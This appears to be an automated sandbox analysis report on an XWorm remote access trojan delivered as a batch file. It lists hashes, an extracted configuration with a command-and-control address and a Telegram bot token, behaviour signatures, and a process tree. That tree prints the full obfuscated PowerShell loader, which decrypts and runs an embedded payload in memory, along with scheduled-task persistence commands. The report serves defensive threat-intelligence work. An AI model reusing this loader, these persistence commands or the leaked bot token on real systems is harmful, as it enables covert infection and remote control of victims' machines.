Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-08-2024 02:30

General

  • Target

    ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9.bat

  • Size

    275KB

  • MD5

    536ac91b5fe6a53fd85f5d7b609dc591

  • SHA1

    5fb565c1bec3e386642e921c34ea365fbcb07127

  • SHA256

    ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9

  • SHA512

    b47aeba5a1abdcd8b1b6ba67663fb199fca22a21c1417aa830d042268f6c810b9abf246b964d7dc76497b009f8d54e77c1b0f38e5c775097b9fa15dbd19b748f

  • SSDEEP

    6144:h1E5NlqQRcu+pHfFQS7w1bUyntarmxcGqKxH1279F:h1E5qz9H9T7w1bUotqgRH+

Malware Config

Extracted

Family

xworm

Version

5.0

C2

95.98.144.201:2404

Mutex

JnG5DxKNjDpRvsxT

Attributes
  • Install_directory

    %Temp%

  • install_file

    e45iasd.exe

  • telegram

    https://api.telegram.org/bot6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4264
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4240
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:2840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\Admin\AppData\Local\Temp\ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_525_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_525.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4840
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_525.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3504
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_525.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3828
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3384
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:1900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\Admin\AppData\Roaming\startup_str_525.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: AddClipboardFormatListener
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3996
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\Admin\AppData\Local\Temp\e45iasd.exe"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4164
      • C:\Users\Admin\AppData\Local\Temp\e45iasd.exe
        C:\Users\Admin\AppData\Local\Temp\e45iasd.exe
        1⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:3032

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        69d4323823b16e87bc723f71f1f1032d

        SHA1

        1a2d038a7ff602fdc5dd9a19eb7571b84af01301

        SHA256

        0f708cb3ab5d7ffb648d30f115705c2cabdc27c974820b57fbc2eb917a0a3cd5

        SHA512

        9a34955ca25dfe253be27940df661abb67d27a31371aa87907cb513a3983ef2c4895cbd2de91c051ab9c7a1c1c5796ad64bad2bfd9cca27dc1d0acab297054ef

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1lzs5tw1.tlx.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\e45iasd.exe

        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • C:\Users\Admin\AppData\Roaming\startup_str_525.bat

        Filesize

        275KB

        MD5

        536ac91b5fe6a53fd85f5d7b609dc591

        SHA1

        5fb565c1bec3e386642e921c34ea365fbcb07127

        SHA256

        ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9

        SHA512

        b47aeba5a1abdcd8b1b6ba67663fb199fca22a21c1417aa830d042268f6c810b9abf246b964d7dc76497b009f8d54e77c1b0f38e5c775097b9fa15dbd19b748f

      • C:\Users\Admin\AppData\Roaming\startup_str_525.vbs

        Filesize

        115B

        MD5

        ac1d74934ad6451cbaf2b1a54b051917

        SHA1

        d037bc10cb46a2b324e4a033ca710eb29d29c96f

        SHA256

        b0e1ae5e7a941d3e453fd9412a508b731ab4d957a504faa1b6cacfe9a8f6a75e

        SHA512

        c177173511dc2205e9c001b7297135343126aab638f277b912d809457afc4c2aff1d1bb7efcf56a464501a493a25157d95177b7883084e646c893b6b2cf9242b

      • memory/2996-11-0x00007FF8D0870000-0x00007FF8D1331000-memory.dmp

        Filesize

        10.8MB

      • memory/2996-14-0x0000019AB2F60000-0x0000019AB2F96000-memory.dmp

        Filesize

        216KB

      • memory/2996-51-0x00007FF8D0870000-0x00007FF8D1331000-memory.dmp

        Filesize

        10.8MB

      • memory/2996-13-0x0000019AB2F30000-0x0000019AB2F38000-memory.dmp

        Filesize

        32KB

      • memory/2996-12-0x00007FF8D0870000-0x00007FF8D1331000-memory.dmp

        Filesize

        10.8MB

      • memory/2996-0-0x00007FF8D0873000-0x00007FF8D0875000-memory.dmp

        Filesize

        8KB

      • memory/2996-10-0x0000019AB2F90000-0x0000019AB2FB2000-memory.dmp

        Filesize

        136KB

      • memory/3032-67-0x000001D863080000-0x000001D8630F6000-memory.dmp

        Filesize

        472KB

      • memory/3032-66-0x000001D860AB0000-0x000001D860AF4000-memory.dmp

        Filesize

        272KB

      • memory/3996-49-0x000001EF656F0000-0x000001EF65726000-memory.dmp

        Filesize

        216KB

      • memory/3996-50-0x000001EF65720000-0x000001EF65734000-memory.dmp

        Filesize

        80KB

      • memory/4840-30-0x00007FF8D0870000-0x00007FF8D1331000-memory.dmp

        Filesize

        10.8MB

      • memory/4840-27-0x00007FF8D0870000-0x00007FF8D1331000-memory.dmp

        Filesize

        10.8MB

      • memory/4840-26-0x00007FF8D0870000-0x00007FF8D1331000-memory.dmp

        Filesize

        10.8MB

      • memory/4840-16-0x00007FF8D0870000-0x00007FF8D1331000-memory.dmp

        Filesize

        10.8MB